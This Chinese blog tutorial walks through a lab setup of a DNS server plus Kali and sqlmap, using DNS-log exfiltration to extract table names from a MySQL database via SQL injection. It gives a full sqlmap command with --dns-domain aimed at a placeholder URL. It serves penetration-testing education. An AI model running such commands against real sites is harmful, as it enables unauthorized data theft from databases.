-
SQLmap 结合本地dnslog实现注入
1.前提
- mysql中secure_file-priv参数必须为空而不是null
-
- 1.kali(使用sqlmap) ip:192.168.10.137
- 2.windows10 ip: 192.168.10.33
- 3.windows 2008 R2 ( 需要设置dns服务器)ip :192.168.10.138
2.安装DNS服务器
2.1添加DNS服务器及正向查找文件添加记录
2.2在监视中对测试类型打钩
2.3添加条件转发器
ip为kali 的ip
3. 设置靶机的dns地址
需要修改靶机的dns服务器为我们设置的dns服务器
4.在kali上:tcpdump -n port 53
在kali看到了数据包证明成功
5.开始sqlmap结合dnslog进行注入
命令格式:sqlmap -u "http://xx.xx.xx.xx/index.php?id=1" --technique=T --dns-domain "oupeng.top" -D security --tables
- 命令格式:sqlmap -u "http://xx.xx.xx.xx/index.php?id=1"
- --technique=T --dns-domain "oupeng.top" -D security --tables
- mysql中secure_file-priv参数必须为空而不是null
-
相关阅读:
瑞吉外卖02-后台功能
走进乌镇峰会,《个人信息保护法》实施一周年实践与展望
微服务框架 SpringCloud微服务架构 7 Feign 7.1 基于Feign 远程调用
信创国产化大背景下,应用性能体验如何保障?
React中useRef()方法
风丘远程试验管理平台TFM 支持“一键式“数据管理和监控
ElasticSearch学习笔记(二)
HTTP 的前世今生
net-java-php-python-伊犁旅游网站计算机毕业设计程序
金九银十面试季在即,Android程序猿如何斩获offer?
- 原文地址:https://blog.csdn.net/lin152235/article/details/126159211